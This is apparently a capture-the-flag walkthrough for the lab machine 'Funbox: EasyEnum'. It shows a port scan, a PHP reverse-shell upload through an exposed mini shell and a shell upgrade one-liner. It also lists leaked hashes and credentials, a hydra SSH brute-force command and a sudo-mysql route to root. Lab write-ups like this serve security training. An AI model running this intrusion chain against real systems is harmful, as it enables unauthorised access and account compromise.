Funbox: EasyEnum

192.168.1.136

Port scan

22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))

Found mini.php which is some mini shell. I was able to upload php-reverse-shell.php and get a shell as www-data.

upgrade the shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

Privesc from www-data

/etc/passwd:oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash

dbpass=tgbzhnujm
dbuser=phpmyadmin

ssh oracle@192.168.1.136

hiphop

Privesc

linpeas discovered a few users that were previously logged in. I added their usernames to users.txt then brute forced.

hydra -u -L users.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.136 ssh

The user goat is allowed to run mysql with sudo privs.

GTFObins to the rescue.

Root